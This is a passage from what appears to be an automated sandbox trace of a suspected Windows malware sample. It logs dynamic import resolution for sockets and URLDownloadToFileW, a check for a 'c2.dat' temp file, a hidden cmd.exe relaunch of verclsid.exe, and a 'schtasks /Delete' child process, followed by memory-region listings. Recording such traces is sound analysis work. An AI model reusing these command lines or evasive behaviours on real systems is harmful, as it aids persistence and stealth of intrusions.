[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAStartup", cchWideChar=10, lpMultiByteStr=0x1e58d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAStartup", lpUsedDefaultChar=0x0) returned 10
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="WSAStartup") returned 0x7feffa14980
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6
[0381.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="socket", cchWideChar=6, lpMultiByteStr=0x1e58d00, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="socket", lpUsedDefaultChar=0x0) returned 6
[0381.253] GetProcAddress (hModule=0x7fef79b0000, lpProcName="socket") returned 0x7feffa1de90
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSACleanup", cchWideChar=10, lpMultiByteStr=0x1e58d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSACleanup", lpUsedDefaultChar=0x0) returned 10
[0381.254] GetProcAddress (hModule=0x7fef79b0000, lpProcName="WSACleanup") returned 0x7feffa14cc0
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostbyname", cchWideChar=13, lpMultiByteStr=0x1e58d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostbyname", lpUsedDefaultChar=0x0) returned 13
[0381.254] GetProcAddress (hModule=0x7fef79b0000, lpProcName="gethostbyname") returned 0x7feffa18df0
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="send", cchWideChar=4, lpMultiByteStr=0x1e58d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="send", lpUsedDefaultChar=0x0) returned 4
[0381.254] GetProcAddress (hModule=0x7fef79b0000, lpProcName="send") returned 0x7feffa18000
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7
[0381.254] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="connect", cchWideChar=7, lpMultiByteStr=0x1e58d00, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="connect", lpUsedDefaultChar=0x0) returned 7
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="connect") returned 0x7feffa145c0
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="recv", cchWideChar=4, lpMultiByteStr=0x1e58d00, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="recv", lpUsedDefaultChar=0x0) returned 4
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="recv") returned 0x7fef79b1744
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="gethostname", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gethostname", lpUsedDefaultChar=0x0) returned 11
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="gethostname") returned 0x7feffa1ae20
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="inet_ntoa", cchWideChar=9, lpMultiByteStr=0x1e58d00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inet_ntoa", lpUsedDefaultChar=0x0) returned 9
[0381.255] GetProcAddress (hModule=0x7fef79b0000, lpProcName="inet_ntoa") returned 0x7feffa1d9a0
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
[0381.255] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ntohs", cchWideChar=5, lpMultiByteStr=0x1e58d00, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntohs", lpUsedDefaultChar=0x0) returned 5
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="ntohs") returned 0x7feffa11250
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WSAGetLastError", cchWideChar=15, lpMultiByteStr=0x1e58d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WSAGetLastError", lpUsedDefaultChar=0x0) returned 15
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="WSAGetLastError") returned 0x7feffa11290
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getpeername", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getpeername", lpUsedDefaultChar=0x0) returned 11
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="getpeername") returned 0x7feffa3e450
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="getsockname", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="getsockname", lpUsedDefaultChar=0x0) returned 11
[0381.256] GetProcAddress (hModule=0x7fef79b0000, lpProcName="getsockname") returned 0x7feffa19480
[0381.256] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0381.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13
[0381.311] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ShellExecuteW", cchWideChar=13, lpMultiByteStr=0x1e58d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExecuteW", lpUsedDefaultChar=0x0) returned 13
[0381.311] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="ShellExecuteW") returned 0x7fefe20983c
[0381.312] LoadLibraryW (lpLibFileName="URLMON.DLL") returned 0x7fefdba0000
[0381.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0381.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="URLDownloadToFileW", cchWideChar=18, lpMultiByteStr=0x1e58d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URLDownloadToFileW", lpUsedDefaultChar=0x0) returned 18
[0381.347] GetProcAddress (hModule=0x7fefdba0000, lpProcName="URLDownloadToFileW") returned 0x7fefdc395e4
[0381.347] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x7fefe1f0000
[0381.347] LoadLibraryW (lpLibFileName="shlwapi.dll") returned 0x7feff630000
[0381.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0381.347] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="StrRetToStrW", cchWideChar=12, lpMultiByteStr=0x1e58d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StrRetToStrW", lpUsedDefaultChar=0x0) returned 12
[0381.347] GetProcAddress (hModule=0x7feff630000, lpProcName="StrRetToStrW") returned 0x7feff641078
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetDesktopFolder", cchWideChar=18, lpMultiByteStr=0x1e58d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetDesktopFolder", lpUsedDefaultChar=0x0) returned 18
[0381.348] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetDesktopFolder") returned 0x7fefe218660
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHGetFolderLocation", cchWideChar=19, lpMultiByteStr=0x1e58d00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHGetFolderLocation", lpUsedDefaultChar=0x0) returned 19
[0381.348] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHGetFolderLocation") returned 0x7fefe27a274
[0381.348] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18
[0381.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SHParseDisplayName", cchWideChar=18, lpMultiByteStr=0x1e58d00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SHParseDisplayName", lpUsedDefaultChar=0x0) returned 18
[0381.349] GetProcAddress (hModule=0x7fefe1f0000, lpProcName="SHParseDisplayName") returned 0x7fefe274570
[0381.349] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x7fefdf10000
[0381.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0381.349] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitialize", cchWideChar=12, lpMultiByteStr=0x1e58d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitialize", lpUsedDefaultChar=0x0) returned 12
[0381.349] GetProcAddress (hModule=0x7fefdf10000, lpProcName="CoInitialize") returned 0x7fefdf2a51c
[0381.351] LoadLibraryW (lpLibFileName="iphlpapi.dll") returned 0x7fefb2c0000
[0381.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.362] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetTcpTable", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetTcpTable", lpUsedDefaultChar=0x0) returned 11
[0381.362] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="GetTcpTable") returned 0x7fefb2d13ac
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SetTcpEntry", cchWideChar=11, lpMultiByteStr=0x1e58d00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetTcpEntry", lpUsedDefaultChar=0x0) returned 11
[0381.363] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="SetTcpEntry") returned 0x7fefb2d2fb0
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCreateFile", cchWideChar=14, lpMultiByteStr=0x1e58d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCreateFile", lpUsedDefaultChar=0x0) returned 14
[0381.363] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCreateFile") returned 0x7fefb2c8250
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpCloseHandle", cchWideChar=15, lpMultiByteStr=0x1e58d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpCloseHandle", lpUsedDefaultChar=0x0) returned 15
[0381.363] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpCloseHandle") returned 0x7fefb2c7cc0
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12
[0381.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="IcmpSendEcho", cchWideChar=12, lpMultiByteStr=0x1e58d00, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IcmpSendEcho", lpUsedDefaultChar=0x0) returned 12
[0381.364] GetProcAddress (hModule=0x7fefb2c0000, lpProcName="IcmpSendEcho") returned 0x7fefb2c8340
[0381.364] DisableThreadLibraryCalls (hLibModule=0x1b90000) returned 1
[0381.364] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0381.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="Control_RunDLL", cbMultiByte=14, lpWideCharStr=0x24ca40, cchWideChar=2047 | out: lpWideCharStr="Control_RunDLL") returned 14
[0381.366] DllGetClassObject (in: rclsid=0x387110*(Data1=0xa78ed123, Data2=0xab77, Data3=0x406b, Data4=([0]=0x99, [1]=0x99, [2]=0x2a, [3]=0x5d, [4]=0x9d, [5]=0x2f, [6]=0x7f, [7]=0xb7)), riid=0x7fefe096cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x24e710 | out: ppv=0x24e710*=0x0) returned 0x0
[0381.366] GetCommandLineW () returned="verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
[0381.367] FindWindowW (lpClassName="msprotB7", lpWindowName="") returned 0x0
[0381.368] GetTempPathW (in: nBufferLength=0x105, lpBuffer=0x24e2e6 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0381.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43
[0381.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cchWideChar=43, lpMultiByteStr=0x1e2d9e0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", lpUsedDefaultChar=0x0) returned 43
[0381.369] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat", cbMultiByte=43, lpWideCharStr=0x24d200, cchWideChar=2047 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat") returned 43
[0381.369] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\c2.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\c2.dat"), lpFindFileData=0x24e290 | out: lpFindFileData=0x24e290*(dwFileAttributes=0x386a30, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x386a30, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x1ba36fd, nFileSizeHigh=0x0, nFileSizeLow=0x24e2b0, dwReserved0=0x0, dwReserved1=0x24e2d8, cFileName="", cAlternateFileName="߾")) returned 0xffffffffffffffff
[0381.373] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/c start \"\" verclsid.exe /M /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7} & Exit", lpDirectory=0x0, nShowCmd=0) returned 0x2a
Thread:
id = 107
os_tid = 0xcd8
Thread:
id = 108
os_tid = 0xd0c
Thread:
id = 109
os_tid = 0xd04
Process:
id = "15"
image_name = "schtasks.exe"
filename = "c:\\windows\\system32\\schtasks.exe"
page_root = "0x74c64000"
os_pid = "0xce4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "9"
os_parent_pid = "0xb34"
cmd_line = "schtasks /Delete /TN \\Z11 /f"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2069
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2070
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2071
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2072
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 2073
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2074
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2075
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2076
start_va = 0xffa50000
end_va = 0xffa97fff
monitored = 1
entry_point = 0xffa7966c
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")
Region:
id = 2077
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2078
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2079
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 2080
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 2081
start_va = 0x50000
end_va = 0x17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2082
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2083
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2084
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2085
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2086
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2087
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2088
start_va = 0x250000
end_va = 0x2b6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2089
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2090
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2091
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2092
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2093
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2094
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2095
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2096
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
